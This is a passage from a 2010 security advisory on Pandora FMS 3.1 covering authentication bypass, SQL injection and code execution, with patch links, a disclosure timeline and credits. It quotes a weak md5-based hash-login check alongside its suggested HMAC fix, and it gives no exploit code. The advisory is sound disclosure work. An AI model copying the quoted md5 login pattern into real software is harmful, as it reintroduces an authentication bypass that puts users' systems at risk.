purposes.\r\n\r\nSnippet of code (index.php, version 3.1.1):\r\n\r\n145 // Hash login process\r\n(...)\r\n150 if ($config["loginhash_pwd"] != "" && $loginhash_data ==\r\nmd5($loginhash_user.$config["loginhash_pwd"])) {\r\n\r\nIn line 150, use\r\nhash_hmac("sha256",$loginhash_user,$config["loginhash_pwd"]), instead of\r\nmd5($lioginhash_user.$config["loginhash_pwd"])\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70305"}]}
